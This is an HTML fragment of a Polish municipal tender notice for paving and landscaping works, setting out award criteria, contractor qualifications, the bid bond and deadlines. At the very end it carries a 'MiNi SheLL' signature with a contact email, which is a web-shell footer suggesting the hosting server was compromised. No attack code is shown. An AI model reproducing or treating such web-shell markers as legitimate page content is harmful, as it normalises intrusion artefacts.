class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego<br/>(podobnego/dodatkowego - zgodnie z art. 214 ust. 1 pkt. 7 ustawy Pzp), Zamawiający<br/>przewiduje możliwość udzielenia zamówienia uzupełniającego w wysokości do 30% wartości<br/>szacowanego zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonuje badania oświadczeń stanowiących wstępne<br/>potwierdzenie, że na dzień składania ofert Wykonawca nie podlega wykluczeniu i spełnia warunki<br/>udziału w postępowaniu. Następnie Zamawiający dokonuje oceny ofert, a następnie zbada, czy<br/>Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz<br/>spełnia warunki udziału w postępowaniu. W takim przypadku, w terminie nie krótszym niż 5 dni wezwie<br/>Wykonawcę, który przedstawił najkorzystniejszą ofertę do złożenia dokumentów potwierdzających<br/>spełnianie warunków udziału oraz niepodleganie wykluczeniu z postępowania.<br/>Art.274 ustawy pzp stosuje się.<br/>2. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych ofert.<br/>3. Zamawiający dokona poprawek w ofercie zgodnie z zapisami art.223 ust. 2 ustawy pzp.<br/>4. W przypadku rozbieżności pomiędzy ceną podaną<br/>przez wykonawcę w ofercie wyrażoną słownie oraz cyfrowo za prawidłową Zamawiający uzna wartość<br/>(cenę) wyrażoną słownie z zastrzeżeniem art. 223 ust. 2 pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące: postępowaniu<br/>6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>6.1.3. uprawnień sytuacji ekonomicznej lub finansowej:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Wykonawca musi posiadać środki finansowe lub zdolność kredytową na kwotę nie<br/>mniejszą niż 5.000.000,00 zł (a w przypadku, jeżeli wartość została wyrażona w<br/>walucie obcej – równowartość 5.000.000,00 zł wg średniego kursu NBP z dnia<br/>wystawienia informacji).<br/>6.1.4. zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>1)Wykonawca winien wykazać, że wykonał należycie oraz zgodnie<br/>z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie:<br/>a) co najmniej jedną realizację (zamówienie) o wartości minimum<br/>1.000.000,00 zł brutto, porównywalną z przedmiotem zamówienia tj. polegającą<br/>na budowie i/lub przebudowie i/lub remoncie nawierzchni: drogi, skweru, placu,<br/>ciągu pieszo-jezdnego lub parkingu, wykonanej z płyt i/lub kamienia naturalnego<br/>na zabytku lub w strefie ochrony konserwatorskiej w terenie zabudowy wraz z<br/>budową/przebudową infrastruktury technicznej liniowej.<br/>b) co najmniej jedną realizację (zamówienie), porównywalną z przedmiotem<br/>zamówienia tj. polegającą na założeniu terenów zieleni niskiej, średniej i wysokiej<br/>o powierzchni min. 2.000 m2 w terenie zabudowy, w tym: nasadzeń drzew,<br/>krzewów, roślin okrywowych, trawników itp. w gruncie - na zabytku lub w strefie<br/>ochrony konserwatorskiej.<br/>W celu wykazania się spełnianiem powyższego warunku, Wykonawca może wykazać<br/>ich realizację jako odrębne zadania lub też łączne.<br/>2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą<br/>dysponować w okresie wykonywania zamówienia i skierują do jego realizacji:<br/>a) minimum jedną osobę posiadającą uprawnienia do projektowania w branży<br/>architektonicznej,<br/>b) minimum jedną osobę uprawnioną do pełnienia samodzielnych funkcji w<br/>budownictwie, posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjnej i/lub inżynieryjnej, których zakres uprawnia go do<br/>kierowania robotami objętymi przedmiotem zamówienia lub odpowiadające im<br/>równoważne uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej<br/>wskazanych.<br/>c) minimum jedną osobę uprawnioną do pełnienia samodzielnych funkcji w<br/>budownictwie, posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności sieci i instalacji elektroenergetycznych, których zakres uprawnia go<br/>do kierowania robotami objętymi przedmiotem zamówienia lub odpowiadające im<br/>równoważne uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów, a w przypadku Wykonawców zagranicznych –<br/>uprawnienia budowlane do kierowania robotami równoważne do wyżej<br/>wskazanych.<br/>d) minimum jedną osobę uprawnioną do pełnienia samodzielnych funkcji w<br/>budownictwie, posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności sieci i instalacji sanitarnych, których zakres uprawnia go do<br/>kierowania robotami objętymi przedmiotem zamówienia lub odpowiadające im<br/>równoważne uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów, a w przypadku Wykonawców zagranicznych –<br/>uprawnienia budowlane do kierowania robotami równoważne do wyżej<br/>wskazanych.<br/>e) minimum jedną osobę uprawnioną do pełnienia samodzielnych funkcji w<br/>budownictwie, posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności telekomunikacyjnej przewodowej i bezprzewodowej bez ograniczeń,<br/>których zakres uprawnia go do kierowania robotami objętymi przedmiotem<br/>zamówienia lub odpowiadające im równoważne uprawnienia budowlane wydane<br/>na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców<br/>zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do<br/>wyżej wskazanych.<br/>f) minimum jedną osobę uprawnioną do pełnienia samodzielnych funkcji w<br/>budownictwie, posiadającą uprawnienia do kierowania robotami budowlanymi w<br/>specjalności drogowej, których zakres uprawnia go do kierowania robotami<br/>objętymi przedmiotem zamówienia lub odpowiadające im równoważne<br/>uprawnienia budowlane wydane na podstawie wcześniej obowiązujących<br/>przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane<br/>do kierowania robotami równoważne do wyżej wskazanych.<br/>g) minimum jedną osobę posiadającą tytuł zawodowy magistra uzyskany po<br/>ukończeniu wyższych studiów na kierunku archeologia oraz odbyciem po<br/>ukończeniu tych studiów co najmniej 24-miesięcznej praktyki zawodowej w<br/>zakresie nadzoru i/lub prowadzenia prac archeologicznych.<br/>h) minimum jedną osobę posiadającą jedną z n/w kwalifikacji:<br/>mgr inż. architekt krajobrazu lub inżynier architekt krajobrazu z<br/>udokumentowanym 3 letnim stażem pracy na terenach zieleni, lub<br/>mgr inż. ogrodnik lub inżynier ogrodnik z udokumentowanym 3 letnim stażem<br/>pracy w terenach zieleni, lub technik ogrodnik lub technik architekt krajobrazu z udokumentowanym 3<br/>letnim stażem pracy na terenach zieleni.<br/>DODATKOWE INFORMACJE DOTYCZĄCE WARUNKÓW<br/>UDZIAŁU W POSTĘPOWANIU:<br/>1) Wykonawca powinien w wykazie robót wyraźnie określić zakres<br/>i wartość oraz zakres robót, aby można było ustalić, czy spełnia warunek<br/>udziału w postępowaniu.<br/>1) Wartości podane w dokumentach w walutach innych niż wskazane przez<br/>Zamawiającego będą przeliczane wg średniego kursu NBP na dzień publikacji<br/>ogłoszenia.<br/>2) Przez posiadanie uprawnień budowlanych wymaganych prawem dla osób<br/>uczestniczących w realizacji zamówienia, rozumie się uprawnienia do<br/>wykonywania samodzielnych funkcji w budownictwie w rozumieniu art. 15a<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz. U. 2020 r, poz. 1333 z<br/>późn. zm.) oraz przepisów wcześniejszych. Samodzielne funkcje techniczne w<br/>budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z<br/>przepisami regulującymi nadawanie uprawnień budowlanych w dacie ich<br/>nadania.<br/>3) Wykonawca w celu wykazania spełniania warunków określonych w pkt 6.1.4,<br/>ppkt 2) SWZ może wskazać osobę będącą obywatelem państwa członkowskiego<br/>UE, która nabyła kwalifikacje zawodowe do wykonywania działalności w<br/>budownictwie, równoznaczne wykonywaniu samodzielnych funkcji<br/>technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej –<br/>zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220) oraz ustawą z<br/>dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa (Dz. U. z 2019 r. poz. 1117).<br/>6.2. Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art.<br/>116 ust. 2 ustawy pzp).<br/>6.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując<br/>warunek udziału w postępowaniu mogą polegać na zdolnościach tych z Wykonawców,<br/>którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane<br/>6.4. Sposób wykazania warunków udziału w postępowaniu wskazano w Rozdziale 8 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.1. Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące wstępne<br/>potwierdzenie, że Wykonawca na dzień składania ofert:<br/>a) nie podlega wykluczeniu,<br/>b) spełnia warunki udziału w postępowaniu.<br/>8.1.1. Oświadczenia należy złożyć wg wymogów załącznika nr 4 i 5 do SWZ.<br/>8.1.2. Jeżeli Wykonawca nie złożył oświadczeń, o którym mowa w pkt 8.1 SWZ lub są one<br/>niekompletne lub zawierają błędy, Zamawiający wezwie Wykonawcę odpowiednio do<br/>ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że oferta<br/>Wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub<br/>poprawienie lub zachodzą przesłanki unieważnienia postępowania.<br/>8.1.3. Złożenie, uzupełnienie lub poprawienie oświadczeń, o którym mowa w pkt 8.1 SWZ nie<br/>może służyć potwierdzeniu spełniania kryteriów selekcji.<br/>8.1.4. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonych<br/>oświadczeń, o których mowa w pkt 8.1 SWZ.<br/>8.1.5. Jeżeli złożone przez Wykonawcę oświadczenia, o którym mowa w pkt 8.1 SWZ budzą<br/>wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do podmiotu, który<br/>jest w posiadaniu informacji lub dokumentów istotnych w tym zakresie dla oceny<br/>spełniania przez Wykonawcę warunków udziału w postępowaniu, kryteriów selekcji<br/>lub braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>8.2. W przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>8.2.1. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ.<br/>8.2.2. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>8.3.2. W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:<br/>Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków<br/>dowodowych w tym zakresie.<br/>8.4. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie<br/>zamówienia, Zamawiający może na każdym etapie postępowania wezwać wykonawców do<br/>złożenia wszystkich lub niektórych podmiotowych środków dowodowych, wskazanych w pkt.<br/>8.3.1 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących<br/>podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>8.3.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej<br/>potwierdzającej wysokość posiadanych środków finansowych lub zdolność<br/>kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed<br/>złożeniem oferty; kwota min. 5.000.000,00 zł brutto. Jeżeli z uzasadnionej<br/>przyczyny wykonawca nie może złożyć wymaganej przez zamawiającego<br/>informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej<br/>potwierdzającej wysokość posiadanych środków finansowych lub zdolność<br/>kredytową wykonawcy, wykonawca składa inne podmiotowe środki dowodowe,<br/>które w wystarczający sposób potwierdzają spełnianie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu lub kryterium selekcji<br/>dotyczącego sytuacji ekonomicznej lub finansowej; - np. oświadczenie Wykonawcy<br/>– w odniesieniu do warunku określonego w pkt. 6.1.3. SWZ.<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na<br/>rzecz których roboty te zostały wykonane (sporządzonego zgodnie z<br/>Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów określających, czy te<br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt.<br/>1) SWZ,<br/>c) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę<br/>jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych<br/>do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami<br/>sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku<br/>określonego w pkt. 6.1.4. ppkt. 2) SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 13.4. Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ<br/>(przy czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas<br/>obejmować dane wymagane dla oferty w SWZ i załącznikach).<br/>2) Oświadczenia, o których mowa w Rozdziale 8.1 SWZ;<br/>3) Oświadczenie, o którym mowa w Rozdziale 8.2 SWZ (jeżeli dotyczy),<br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy).<br/>5) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby:<br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub<br/>podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, żąda<br/>złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba,<br/>której umocowanie do jego reprezentowania nie wynika z dokumentów, o których<br/>mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego<br/>zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu<br/>potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/>6) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania<br/>ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 12.1. Wykonawca jest zobowiązany wnieść wadium w wysokości: 40.000,00 PLN (słownie zł:<br/>czterdzieści tysięcy złotych),<br/>12.2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>12.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy<br/>Zamawiającego:<br/>GETIN BANK<br/>Nr rachunku: 47 1560 0013 2473 5210 8000 0006<br/>z adnotacją „Wadium – Znak sprawy: ZP.271.1.2022”<br/>Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie<br/>zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania<br/>ofert.<br/>12.4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem<br/>terminu składania ofert.<br/>12.5. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub<br/>poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na<br/>pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi<br/>przepisami i powinna zawierać następujące elementy:<br/>a) nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b) kwotę wadium,<br/>c) termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/>d) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w<br/>gwarancji/poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania<br/>wadium określonych w przepisach ustawy.<br/>12.6. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>12.7. Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy<br/>Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu lub kryteriów selekcji.<br/>b) w przypadku, o którym mowa w Rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy<br/>złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym<br/>środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa<br/>w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-<br/>ą spełnienie warunku.<br/>10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały wskazane w projekcie<br/>umowy stanowiącym załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-13 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy do sekcji III pkt. 3.6) ogłoszenia: 11.12. Jeżeli dokumenty elektroniczne,<br/>przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje<br/>stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993<br/>r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca w celu<br/>utrzymania ich w poufności, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz<br/>z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”, a<br/>następnie z plikami stanowiącymi jawną część należy ten plik zaszyfrować.11.13. Do oferty<br/>należy dołączyć oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu lub kryteriów selekcji, w zakresie wskazanym w pkt 8.1 SWZ w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisemosobistym, a następnie zaszyfrować wraz z plikami stanowiącymi ofertę.11.14. Oferta<br/>może być złożona tylko do upływu terminu składania ofert.11.15. Wykonawca może przed<br/>upływem terminu do składania ofert wycofać ofertę za pośrednictwem „Formularza do złożenia,<br/>zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na<br/>miniPortalu. Sposób wycofania oferty został opisany w „Instrukcji użytkownika” dostępnej na<br/>miniPortalu. 11.16. Wykonawca po upływie terminu do składania ofert nie może skutecznie<br/>dokonać zmiany ani wycofać złożonej oferty.11.17. Komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami w zakresie składania dokumentów, oświadczeń, wniosków (innych niż<br/>ofertktóre<br/>mogą być przekazywane jedynie w sposób wskazany w pkt 11.8 odbywa się elektronicznie<br/>za pośrednictwem:a) dedykowanego formularza:<br/>„Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal;<br/>(dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza<br/>do komunikacji” jako załącznik b) poczty elektronicznej na adres poczty Zamawiającego:<br/>zamowienia.publiczne@um.pabianice.pl (dopuszcza się składanie dokumentów elektronicznych<br/>za<br/>pomocą poczty elektronicznej). Zamawiający przekazuje dokumenty na adres poczty<br/>elektronicznej wskazany w formularzu ofertowym Wykonawcy, na co Wykonawca wyraża zgodę<br/>wskazując ten adres w ofercie i zobowiązuje się do utrzymania jego funkcjonalności przez czas<br/>trwania postępowania. Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na<br/>adres poczty elektronicznej wskazany w formularzu ofertowym zostały doręczone skutecznie, a<br/>Wykonawca zapoznał się z ich treścią.<br/>Wszystkie szczegółowe informacje w SWZ opublikowanym na stronie postępowania https://www.bip.um.pabianice.pl<br/>Zamawiający informuje, iż zamówienie jest finansowane z budżetu Miasta Pabianice oraz w ramach<br/>Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych.

Creat By MiNi SheLL
Email: jattceo@gmail.com